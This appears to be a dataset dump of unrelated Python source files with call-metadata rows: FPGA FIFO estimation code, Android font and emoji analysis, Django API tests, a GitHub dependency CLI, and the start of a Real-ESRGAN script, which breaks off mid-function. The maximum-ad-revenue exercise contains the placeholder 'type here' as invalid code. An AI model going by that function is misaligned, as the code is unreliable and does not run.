folded_shape = self.get_nodeattr("folded_shape")
# extract inner dimension
inner_dim = folded_shape[-1]
# multiply with the next inner dimension
folding_factor = folded_shape[-2] * inner_dim
normal_ishape = []
# create the normal_ishape
for i in range(len(folded_shape) - 2):
normal_ishape.append(folded_shape[i])
normal_ishape.append(folding_factor)
return normal_ishape
def get_normal_output_shape(self):
return self.get_normal_input_shape()
def get_folded_input_shape(self):
return self.get_nodeattr("folded_shape")
def get_folded_output_shape(self):
return self.get_nodeattr("folded_shape")
def get_instream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def get_outstream_width(self):
dtype = DataType[self.get_nodeattr("dataType")]
folded_shape = self.get_nodeattr("folded_shape")
in_width = folded_shape[-1] * dtype.bitwidth()
return in_width
def execute_node(self, context, graph):
mode = self.get_nodeattr("exec_mode")
node = self.onnx_node
inp = context[node.input[0]]
exp_shape = self.get_normal_input_shape()
if mode == "cppsim":
output = inp
output = np.asarray([output], dtype=np.float32).reshape(*exp_shape)
context[node.output[0]] = output
elif mode == "rtlsim":
code_gen_dir = self.get_nodeattr("code_gen_dir_ipgen")
# create a npy file for the input of the node
assert (
str(inp.dtype) == "float32"
), """Input datatype is
not float32 as expected."""
expected_inp_shape = self.get_folded_input_shape()
reshaped_input = inp.reshape(expected_inp_shape)
if DataType[self.get_nodeattr("dataType")] == DataType.BIPOLAR:
# store bipolar activations as binary
reshaped_input = (reshaped_input + 1) / 2
export_idt = DataType.BINARY
else:
export_idt = DataType[self.get_nodeattr("dataType")]
# make copy before saving the array
reshaped_input = reshaped_input.copy()
np.save(os.path.join(code_gen_dir, "input_0.npy"), reshaped_input)
sim = self.get_rtlsim()
nbits = self.get_instream_width()
inp = npy_to_rtlsim_input(
"{}/input_0.npy".format(code_gen_dir), export_idt, nbits
)
super().reset_rtlsim(sim)
super().toggle_clk(sim)
output = self.rtlsim(sim, inp)
odt = DataType[self.get_nodeattr("dataType")]
target_bits = odt.bitwidth()
packed_bits = self.get_outstream_width()
out_npy_path = "{}/output.npy".format(code_gen_dir)
out_shape = self.get_folded_output_shape()
rtlsim_output_to_npy(
output, out_npy_path, odt, out_shape, packed_bits, target_bits
)
# load and reshape output
output = np.load(out_npy_path)
oshape = self.get_normal_output_shape()
output = np.asarray([output], dtype=np.float32).reshape(*oshape)
context[node.output[0]] = output
else:
raise Exception(
"""Invalid value for attribute exec_mode! Is currently set to: {}
has to be set to one of the following value ("cppsim", "rtlsim")""".format(
mode
)
)
def get_number_output_values(self):
folded_oshape = self.get_folded_output_shape()
return np.prod(folded_oshape[:-1])
def global_includes(self):
pass
def defines(self, var):
pass
def read_npy_data(self):
pass
def strm_decl(self):
pass
def docompute(self):
pass
def dataoutstrm(self):
pass
def save_as_npy(self):
pass
def blackboxfunction(self):
pass
def pragmas(self):
pass
def code_generation_ipi(self):
impl_style = self.get_nodeattr("impl_style")
if impl_style == "rtl":
return super().code_generation_ipi()
elif impl_style == "vivado":
cmd = []
node_name = self.onnx_node.name
depth = self.get_nodeattr("depth")
ram_style = self.get_nodeattr("ram_style")
# create a hierarchy for this layer, with the same port names
clk_name = self.get_verilog_top_module_intf_names()["clk"][0]
rst_name = self.get_verilog_top_module_intf_names()["rst"][0]
dout_name = self.get_verilog_top_module_intf_names()["m_axis"][0][0]
din_name = self.get_verilog_top_module_intf_names()["s_axis"][0][0]
cmd.append("create_bd_cell -type hier %s" % node_name)
cmd.append("create_bd_pin -dir I -type clk /%s/%s" % (node_name, clk_name))
cmd.append("create_bd_pin -dir I -type rst /%s/%s" % (node_name, rst_name))
cmd.append(
"create_bd_intf_pin -mode Master "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s"
% (node_name, dout_name)
)
cmd.append(
"create_bd_intf_pin -mode Slave "
"-vlnv xilinx.com:interface:axis_rtl:1.0 /%s/%s" % (node_name, din_name)
)
# instantiate and configure DWC
cmd.append(
"create_bd_cell -type ip "
"-vlnv xilinx.com:ip:axis_data_fifo:2.0 /%s/fifo" % node_name
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_DEPTH {%d}] "
"[get_bd_cells /%s/fifo]" % (depth, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.FIFO_MEMORY_TYPE {%s}] "
"[get_bd_cells /%s/fifo]" % (ram_style, node_name)
)
cmd.append(
"set_property -dict [list CONFIG.TDATA_NUM_BYTES {%d}] "
"[get_bd_cells /%s/fifo]"
% (np.ceil(self.get_outstream_width() / 8), node_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/M_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, dout_name)
)
cmd.append(
"connect_bd_intf_net [get_bd_intf_pins %s/fifo/S_AXIS] "
"[get_bd_intf_pins %s/%s]" % (node_name, node_name, din_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aresetn]"
% (node_name, rst_name, node_name)
)
cmd.append(
"connect_bd_net [get_bd_pins %s/%s] "
"[get_bd_pins %s/fifo/s_axis_aclk]" % (node_name, clk_name, node_name)
)
return cmd
else:
raise Exception(
"FIFO implementation style %s not supported, please use rtl or vivado"
% impl_style
)
def bram_estimation(self):
"""Calculates resource estimation for BRAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "block"):
# Non-BRAM based implementation
return 0
if W == 1:
return math.ceil(depth / 16384)
elif W == 2:
return math.ceil(depth / 8192)
elif W <= 4:
return (math.ceil(depth / 4096)) * (math.ceil(W / 4))
elif W <= 9:
return (math.ceil(depth / 2048)) * (math.ceil(W / 9))
elif W <= 18 or depth > 512:
return (math.ceil(depth / 1024)) * (math.ceil(W / 18))
else:
return (math.ceil(depth / 512)) * (math.ceil(W / 36))
def uram_estimation(self):
"""Calculates resource estimation for URAM"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
if impl == "rtl" or (impl == "vivado" and ram_type != "ultra"):
# Non-BRAM based implementation
return 0
else:
return (math.ceil(depth / 4096)) * (math.ceil(W / 72))
def bram_efficiency_estimation(self):
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
bram16_est = self.bram_estimation()
if bram16_est == 0:
return 1
wbits = W * depth
bram16_est_capacity = bram16_est * 36 * 512
return wbits / bram16_est_capacity
def lut_estimation(self):
"""Calculates resource estimations for LUTs"""
impl = self.get_nodeattr("impl_style")
ram_type = self.get_nodeattr("ram_style")
depth = self.get_nodeattr("depth")
W = self.get_instream_width()
address_luts = 2 * math.ceil(math.log(depth, 2))
if impl == "rtl" or (impl == "vivado" and ram_type == "distributed"):
ram_luts = (math.ceil(depth / 32)) * (math.ceil(W / 2))
else:
ram_luts = 0
return int(address_luts + ram_luts)
def prepare_rtlsim(self):
assert self.get_nodeattr("impl_style") != "vivado", (
"StreamingFIFO impl_style "
"cannot be vivado for rtlsim. Only impl_style=rtl supported."
)
super().prepare_rtlsim()
| [((124, 8, 124, 32), 'os.makedirs', 'os.makedirs', ({(124, 20, 124, 31): 'verilog_dir'}, {}), '(verilog_dir)', False, 'import os\n'), ((127, 17, 127, 55), 'os.path.join', 'os.path.join', ({(127, 30, 127, 43): 'memstream_dir', (127, 45, 127, 54): '"""Q_srl.v"""'}, {}), "(memstream_dir, 'Q_srl.v')", False, 'import os\n'), ((128, 8, 128, 33), 'shutil.copy', 'copy', ({(128, 13, 128, 19): 'Q_file', (128, 21, 128, 32): 'verilog_dir'}, {}), '(Q_file, verilog_dir)', False, 'from shutil import copy\n'), ((184, 26, 184, 80), 'subprocess.Popen', 'subprocess.Popen', (), '', False, 'import subprocess\n'), ((305, 15, 305, 42), 'numpy.prod', 'np.prod', ({(305, 23, 305, 41): 'folded_oshape[:-1]'}, {}), '(folded_oshape[:-1])', True, 'import numpy as np\n'), ((104, 12, 104, 35), 'warnings.warn', 'warnings.warn', ({(104, 26, 104, 34): 'warn_str'}, {}), '(warn_str)', False, 'import warnings\n'), ((172, 17, 172, 60), 'os.path.join', 'os.path.join', ({(172, 30, 172, 41): 'verilog_dir', (172, 43, 172, 59): '"""package_ip.tcl"""'}, {}), "(verilog_dir, 'package_ip.tcl')", False, 'import os\n'), ((199, 12, 201, 13), 'warnings.warn', 'warnings.warn', ({(200, 16, 200, 87): '"""Depth is high, set between 2 and 256 for efficient SRL implementation"""'}, {}), "(\n 'Depth is high, set between 2 and 256 for efficient SRL implementation')", False, 'import warnings\n'), ((414, 19, 414, 43), 'math.ceil', 'math.ceil', ({(414, 29, 414, 42): '(depth / 16384)'}, {}), '(depth / 16384)', False, 'import math\n'), ((82, 17, 82, 41), 'numpy.random.randn', 'np.random.randn', ({(82, 33, 82, 40): '*oshape'}, {}), '(*oshape)', True, 'import numpy as np\n'), ((286, 12, 288, 13), 'finn.util.data_packing.rtlsim_output_to_npy', 'rtlsim_output_to_npy', ({(287, 16, 287, 22): 'output', (287, 24, 287, 36): 'out_npy_path', (287, 38, 287, 41): 'odt', (287, 43, 287, 52): 'out_shape', (287, 54, 287, 65): 'packed_bits', (287, 67, 287, 78): 'target_bits'}, {}), '(output, out_npy_path, odt, out_shape, packed_bits,\n target_bits)', False, 'from finn.util.data_packing import npy_to_rtlsim_input, rtlsim_output_to_npy\n'), ((290, 21, 290, 42), 'numpy.load', 'np.load', ({(290, 29, 290, 41): 'out_npy_path'}, {}), '(out_npy_path)', True, 'import numpy as np\n'), ((416, 19, 416, 42), 'math.ceil', 'math.ceil', ({(416, 29, 416, 41): '(depth / 8192)'}, {}), '(depth / 8192)', False, 'import math\n'), ((438, 20, 438, 43), 'math.ceil', 'math.ceil', ({(438, 30, 438, 42): '(depth / 4096)'}, {}), '(depth / 4096)', False, 'import math\n'), ((438, 48, 438, 65), 'math.ceil', 'math.ceil', ({(438, 58, 438, 64): '(W / 72)'}, {}), '(W / 72)', False, 'import math\n'), ((457, 37, 457, 55), 'math.log', 'math.log', ({(457, 46, 457, 51): 'depth', (457, 53, 457, 54): '(2)'}, {}), '(depth, 2)', False, 'import math\n'), ((460, 24, 460, 45), 'math.ceil', 'math.ceil', ({(460, 34, 460, 44): '(depth / 32)'}, {}), '(depth / 32)', False, 'import math\n'), ((460, 50, 460, 66), 'math.ceil', 'math.ceil', ({(460, 60, 460, 65): '(W / 2)'}, {}), '(W / 2)', False, 'import math\n'), ((253, 21, 253, 59), 'numpy.asarray', 'np.asarray', (), '', True, 'import numpy as np\n'), ((272, 20, 272, 61), 'os.path.join', 'os.path.join', ({(272, 33, 272, 45): 'code_gen_dir', (272, 47, 272, 60): '"""input_0.npy"""'}, {}), "(code_gen_dir, 'input_0.npy')", False, 'import os\n'), ((292, 21, 292, 59), 'numpy.asarray', 'np.asarray', (), '', True, 'import numpy as np\n'), ((418, 20, 418, 43), 'math.ceil', 'math.ceil', ({(418, 30, 418, 42): '(depth / 4096)'}, {}), '(depth / 4096)', False, 'import math\n'), ((418, 48, 418, 64), 'math.ceil', 'math.ceil', ({(418, 58, 418, 63): '(W / 4)'}, {}), '(W / 4)', False, 'import math\n'), ((420, 20, 420, 43), 'math.ceil', 'math.ceil', ({(420, 30, 420, 42): '(depth / 2048)'}, {}), '(depth / 2048)', False, 'import math\n'), ((420, 48, 420, 64), 'math.ceil', 'math.ceil', ({(420, 58, 420, 63): '(W / 9)'}, {}), '(W / 9)', False, 'import math\n'), ((422, 20, 422, 43), 'math.ceil', 'math.ceil', ({(422, 30, 422, 42): '(depth / 1024)'}, {}), '(depth / 1024)', False, 'import math\n'), ((422, 48, 422, 65), 'math.ceil', 'math.ceil', ({(422, 58, 422, 64): '(W / 18)'}, {}), '(W / 18)', False, 'import math\n'), ((424, 20, 424, 42), 'math.ceil', 'math.ceil', ({(424, 30, 424, 41): '(depth / 512)'}, {}), '(depth / 512)', False, 'import math\n'), ((424, 47, 424, 64), 'math.ceil', 'math.ceil', ({(424, 57, 424, 63): '(W / 36)'}, {}), '(W / 36)', False, 'import math\n')] |
chrissimpkins/android_fonts | android_fonts.py | f904147774836468a8c011b1596f85577220b140 | import ast
import emoji
import os
import pandas as pd
_SUPPORT_CACHE_CSV = emoji.datafile('emoji_support.csv')
_API_LEVELS = {
1: ("(no codename)", "1.0"),
2: ("(no codename)", "1.1"),
3: ("Cupcake", "1.5 "),
4: ("Donut", "1.6 "),
5: ("Eclair", "2.0"),
6: ("Eclair", "2.0.1"),
7: ("Eclair", "2.1 "),
8: ("Froyo", "2.2.x "),
9: ("Gingerbread", "2.3 - 2.3.2 "),
10: ("Gingerbread", "2.3.3 - 2.3.7"),
11: ("Honeycomb", "3.0"),
12: ("Honeycomb", "3.1 "),
13: ("Honeycomb", "3.2.x"),
14: ("Ice Cream Sandwich", "4.0.1 - 4.0.2 "),
15: ("Ice Cream Sandwich", "4.0.3 - 4.0.4 "),
16: ("Jelly Bean", "4.1.x"),
17: ("Jelly Bean", "4.2.x"),
18: ("Jelly Bean", "4.3.x"),
19: ("KitKat", "4.4 - 4.4.4"),
21: ("Lollipop", "5.0"),
22: ("Lollipop", "5.1"),
23: ("Marshmallow", "6.0"),
24: ("Nougat", "7.0"),
25: ("Nougat", "7.1"),
26: ("Oreo", "8.0.0"),
27: ("Oreo", "8.1.0"),
28: ("Pie", "9"),
29: ("Android 10 (Q)", "10"),
30: ("Android 11 (R)", "11"),
31: ("Android 12 (S)", "12"),
}
def api_levels():
return _API_LEVELS
def is_font_file(file):
_, ext = os.path.splitext(file)
return ext.lower() in {'.ttf', '.otf', '.ttc'}
def metadata():
records = []
for root, dirs, files in os.walk('api_level'):
for file in files:
if is_font_file(file):
full_file = os.path.join(root, file)
api_level = int(os.path.basename(root))
size = os.stat(full_file).st_size
records.append((api_level, full_file, size))
df = pd.DataFrame(records)
df.columns = ['api_level', 'font_file', 'file_size']
return df
def emoji_support():
"""Dataframe of [emoji_level, font_file, codepoints, supported].
Includes every sequence we could find of any type.
Requires prior execution of populate_emoji_support.py"""
if not os.path.isfile(_SUPPORT_CACHE_CSV):
raise IOError('Please run populate_emoji_support.py first')
return (pd.read_csv(_SUPPORT_CACHE_CSV, converters={'cp_seq': ast.literal_eval})
.rename(columns={'cp_seq': 'codepoints'}))
def font_summary():
df = metadata()
sf = (df
.groupby(['api_level'])
.agg({'font_file': 'count', 'file_size': 'sum'}))
sf['file_size'] = sf['file_size'].apply(lambda sz: (sz / pow(2, 20)))
sf.rename(columns = {
'font_file': 'num_files',
'file_size': 'size_MB',
}, inplace=True)
sf['delta_size_MB'] = sf['size_MB'] - sf['size_MB'].shift(1)
sf.reset_index(inplace=True)
return sf
def emoji_detail():
df = emoji_support()
# merge emoji metadata to gain the status column
df = df.merge(emoji.metadata().drop(columns=['emoji_level']),
on='codepoints')
df = df[df['status'] == 'fully-qualified']
df = df.drop(columns='status')
df.supported = df.supported.astype('int32')
df['api_level'] = df.font_file.str.split('/').str[1]
df.api_level = df.api_level.astype('int32')
df['font_file'] = df.font_file.str.split('/').str[2]
return df
def emoji_summary():
df = emoji_detail()
sf = (df.groupby(['font_file', 'api_level', 'emoji_level'])
.agg({'supported': ['sum', 'count']}))
sf.columns = ['supported', 'total']
sf.reset_index(inplace=True)
sf2 = (sf.drop(columns='emoji_level')
.groupby('api_level')
.agg('sum')
.reset_index())
sf2['delta'] = sf2['supported'] - sf2['supported'].shift(1)
sf2.fillna(0, inplace=True)
return sf, sf2
| [((6, 21, 6, 56), 'emoji.datafile', 'emoji.datafile', ({(6, 36, 6, 55): '"""emoji_support.csv"""'}, {}), "('emoji_support.csv')", False, 'import emoji\n'), ((45, 11, 45, 33), 'os.path.splitext', 'os.path.splitext', ({(45, 28, 45, 32): 'file'}, {}), '(file)', False, 'import os\n'), ((50, 27, 50, 47), 'os.walk', 'os.walk', ({(50, 35, 50, 46): '"""api_level"""'}, {}), "('api_level')", False, 'import os\n'), ((57, 7, 57, 28), 'pandas.DataFrame', 'pd.DataFrame', ({(57, 20, 57, 27): 'records'}, {}), '(records)', True, 'import pandas as pd\n'), ((68, 9, 68, 43), 'os.path.isfile', 'os.path.isfile', ({(68, 24, 68, 42): '_SUPPORT_CACHE_CSV'}, {}), '(_SUPPORT_CACHE_CSV)', False, 'import os\n'), ((70, 10, 70, 82), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((53, 20, 53, 44), 'os.path.join', 'os.path.join', ({(53, 33, 53, 37): 'root', (53, 39, 53, 43): 'file'}, {}), '(root, file)', False, 'import os\n'), ((93, 16, 93, 32), 'emoji.metadata', 'emoji.metadata', ({}, {}), '()', False, 'import emoji\n'), ((54, 24, 54, 46), 'os.path.basename', 'os.path.basename', ({(54, 41, 54, 45): 'root'}, {}), '(root)', False, 'import os\n'), ((55, 15, 55, 33), 'os.stat', 'os.stat', ({(55, 23, 55, 32): 'full_file'}, {}), '(full_file)', False, 'import os\n')] |
amikrop/django-paste | tests/test_list.py | 109f6e5a42bdc20f3cb671471b3ce5c9e329148b | import json
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from paste import constants
from tests.mixins import SnippetListTestCaseMixin
from tests.utils import constant, create_snippet, create_user
class SnippetListTestCase(SnippetListTestCaseMixin, APITestCase):
"""Tests for the snippet list view."""
def url(self):
"""Return the snippet list URL."""
return reverse('snippet-list')
def post(self, **kwargs):
"""Send a POST request to the view's URL with data indicated by given
kwargs, as JSON, using the proper content-type, and return the
response.
"""
return self.client.post(
self.url(), data=json.dumps(kwargs),
content_type='application/json')
def test_get_success(self):
"""Snippet list GET must return all the viewable snippets."""
create_snippet('foo')
create_snippet('bar')
response = self.get()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), 2)
self.assertEqual(response.data[0]['content'], 'foo')
self.assertEqual(response.data[1]['content'], 'bar')
def test_get_private(self):
"""Snippet list GET must return private snippets only to those
authorized to view them.
"""
owner = create_user('owner')
create_snippet('foo', private=True, owner=owner)
expected = [0, 0, 1, 1]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
self.check_for_users(check, owner)
def test_get_list_foreign(self):
"""Snippet list GET must not return snippets owned by other users if
the LIST_FOREIGN setting is True, unless requested by a staff user.
"""
create_snippet('foo')
create_snippet('bar', owner=self.user)
expected = [0, 1, 2]
def check(i):
response = self.get()
self.assertEqual(len(response.data), expected[i])
with constant('LIST_FOREIGN', False):
self.check_for_users(check)
def test_post_success(self):
"""Snippet list POST must create a new snippet."""
response = self.post(
content='foo', style='friendly', embed_title=False)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data['content'], 'foo')
self.assertEqual(response.data['title'], '')
self.assertEqual(response.data['language'], '')
self.assertEqual(response.data['style'], 'friendly')
self.assertEqual(
response.data['line_numbers'], constants.DEFAULT_LINE_NUMBERS)
self.assertFalse(response.data['embed_title'])
self.assertEqual(response.data['private'], constants.DEFAULT_PRIVATE)
self.assertIsNone(response.data['owner'])
def test_post_owner(self):
"""Snippet list POST must store currently authenticated user as the
newly created snippet's owner.
"""
self.client.force_authenticate(self.user)
response = self.post(content='foo')
self.assertEqual(response.data['owner'], self.user.pk)
def test_post_no_content(self):
"""Snippet list POST must return a 400 Bad Request response if no
content field is set.
"""
response = self.post(title='foo')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_oversized_title(self):
"""Snippet list POST must return a 400 Bad Request response if the
title field consists of more characters than the TITLE_MAX_LENGTH
setting indicates.
"""
title = 'a' * (constants.TITLE_MAX_LENGTH + 1)
response = self.post(content='foo', title=title)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_post_invalid(self):
"""Snippet list POST must return a 400 Bad Request response if a value
different than the available choices is set for a multiple choice
field.
"""
for field in ['language', 'style']:
response = self.post(
**{'content': 'foo', field: '123-invalid-abc'})
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST)
def check_post_forbid_anonymous(self, setting):
"""Check that snippet list POST returns a 403 Forbidden response to
anonymous users if the given setting is True.
"""
expected = (
[status.HTTP_403_FORBIDDEN] + [status.HTTP_400_BAD_REQUEST] * 2)
def check(i):
response = self.post()
self.assertEqual(response.status_code, expected[i])
with constant(setting):
self.check_for_users(check)
def test_post_forbid_anonymous(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS')
def test_post_forbid_anonymous_create(self):
"""Snippet list POST must return a 403 Forbidden response to anonymous
users if the FORBID_ANONYMOUS_CREATE setting is True.
"""
self.check_post_forbid_anonymous('FORBID_ANONYMOUS_CREATE')
def test_post_anonymous_private(self):
"""Snippet list POST must return a 400 Bad Request response to
anonymous users who attempt to create a private snippet.
"""
response = self.post(content='foo', private=True)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_pagination(self):
"""Snippet list must be able to handle pagination."""
self.check_pagination()
| [((19, 15, 19, 38), 'django.urls.reverse', 'reverse', ({(19, 23, 19, 37): '"""snippet-list"""'}, {}), "('snippet-list')", False, 'from django.urls import reverse\n'), ((32, 8, 32, 29), 'tests.utils.create_snippet', 'create_snippet', ({(32, 23, 32, 28): '"""foo"""'}, {}), "('foo')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((33, 8, 33, 29), 'tests.utils.create_snippet', 'create_snippet', ({(33, 23, 33, 28): '"""bar"""'}, {}), "('bar')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((44, 16, 44, 36), 'tests.utils.create_user', 'create_user', ({(44, 28, 44, 35): '"""owner"""'}, {}), "('owner')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((45, 8, 45, 56), 'tests.utils.create_snippet', 'create_snippet', (), '', False, 'from tests.utils import constant, create_snippet, create_user\n'), ((58, 8, 58, 29), 'tests.utils.create_snippet', 'create_snippet', ({(58, 23, 58, 28): '"""foo"""'}, {}), "('foo')", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((59, 8, 59, 46), 'tests.utils.create_snippet', 'create_snippet', (), '', False, 'from tests.utils import constant, create_snippet, create_user\n'), ((66, 13, 66, 44), 'tests.utils.constant', 'constant', ({(66, 22, 66, 36): '"""LIST_FOREIGN"""', (66, 38, 66, 43): '(False)'}, {}), "('LIST_FOREIGN', False)", False, 'from tests.utils import constant, create_snippet, create_user\n'), ((130, 13, 130, 30), 'tests.utils.constant', 'constant', ({(130, 22, 130, 29): 'setting'}, {}), '(setting)', False, 'from tests.utils import constant, create_snippet, create_user\n'), ((27, 29, 27, 47), 'json.dumps', 'json.dumps', ({(27, 40, 27, 46): 'kwargs'}, {}), '(kwargs)', False, 'import json\n')] |
ganeshbhandarkar/Python-Projects | Algorithmic Toolbox/Greedy Algorithms/Maximum Advertisement Revenue/maximum_ad_revenue.py | a4df933122a6694d249c69d1e8e95b592cf036a0 | # python3
from itertools import permutations
def max_dot_product_naive(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
max_product = 0
for permutation in permutations(second_sequence):
dot_product = sum(first_sequence[i] * permutation[i] for i in range(len(first_sequence)))
max_product = max(max_product, dot_product)
return max_product
def max_dot_product(first_sequence, second_sequence):
assert len(first_sequence) == len(second_sequence)
assert len(first_sequence) <= 10 ** 3
assert all(0 <= f <= 10 ** 5 for f in first_sequence)
assert all(0 <= s <= 10 ** 5 for s in second_sequence)
type here
if __name__ == '__main__':
n = int(input())
prices = list(map(int, input().split()))
clicks = list(map(int, input().split()))
assert len(prices) == len(clicks) == n
print(max_dot_product(prices, clicks))
| [] |
SamIge7/Tutorials | HelloWorldPython/IfStatements.py | 7a3361768432a6493313d1f0ea1ccc8b2b916aa2 | hasGoodCredit = True
price = 1000000
deposit = 0
if hasGoodCredit:
deposit = price/10
else:
deposit = price/5
print(f"Deposit needed: £{deposit}") | [] |
vsundesha/documentation-hub-dependencies | main.py | 3cdb7c28ceefb7c4ece60fd5e9d3e89640bb0d01 | import config as props
import sys
import getopt
from GitHubDataFetcher import GitHubDataFetcher
from DependencyFile import DependencyFile
from ErrorFile import ErrorFile
# Github Token
TOKEN = props.token
OWNER = ""
REPOSITORY = ""
OUTPUTFILE = ""
def showHelp():
print('-r or --repo The name of the github repository')
print('-o or --owner The owner of the github repository')
print('-f or --outputfile (Optional) (Default : <OWNER+REPONAME>dependecies.json) \
The output file')
def main(argv):
global OWNER, REPOSITORY, OUTPUTFILE
try:
# opts are the arguments and remainders are the arrguments that will not be complete if something goes wrong
opts, remainder = getopt.getopt(
argv, "hr:o:f:", ["repo=", "owner=", "outputfile="])
except getopt.GetoptError:
showHelp()
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
showHelp()
sys.exit()
elif opt in ("-r", "--repo"):
REPOSITORY = arg
elif opt in ("-o", "--owner"):
OWNER = arg
elif opt in ("-f", "--outputfile"):
OUTPUTFILE = arg
# check if repo and owner are specified
if(OWNER and REPOSITORY):
# create the fetcher
data = GitHubDataFetcher(OWNER, REPOSITORY, TOKEN)
# get the response object
res = data.getInfo()
# response is type ErrorFile or DependencyFile
if(isinstance(res, DependencyFile)):
if(OUTPUTFILE):
output = OUTPUTFILE+"dependecies.json"
else:
output = OWNER+REPOSITORY+"dependecies.json"
elif(isinstance(res, ErrorFile)):
output = "error.json"
# write file
res.toJson(output)
else:
print("--repo and --owner arguments are mandatory")
if __name__ == "__main__":
main(sys.argv[1:])
| [((26, 26, 27, 64), 'getopt.getopt', 'getopt.getopt', ({(27, 12, 27, 16): 'argv', (27, 18, 27, 27): '"""hr:o:f:"""', (27, 29, 27, 63): "['repo=', 'owner=', 'outputfile=']"}, {}), "(argv, 'hr:o:f:', ['repo=', 'owner=', 'outputfile='])", False, 'import getopt\n'), ((44, 15, 44, 58), 'GitHubDataFetcher.GitHubDataFetcher', 'GitHubDataFetcher', ({(44, 33, 44, 38): 'OWNER', (44, 40, 44, 50): 'REPOSITORY', (44, 52, 44, 57): 'TOKEN'}, {}), '(OWNER, REPOSITORY, TOKEN)', False, 'from GitHubDataFetcher import GitHubDataFetcher\n'), ((30, 8, 30, 19), 'sys.exit', 'sys.exit', ({(30, 17, 30, 18): '(2)'}, {}), '(2)', False, 'import sys\n'), ((34, 12, 34, 22), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n')] |
blabra/Real-ESRGAN | inference_realesrgan.py | bd5c69d2ef30f27cc2a510443451a2dc841aec28 | import argparse
import cv2
import glob
import os
from basicsr.archs.rrdbnet_arch import RRDBNet
import time
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='Realesrgan-4x', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--face_enhance', action='store_true', help='Use GFPGAN to enhance face')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
args = parser.parse_args()
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
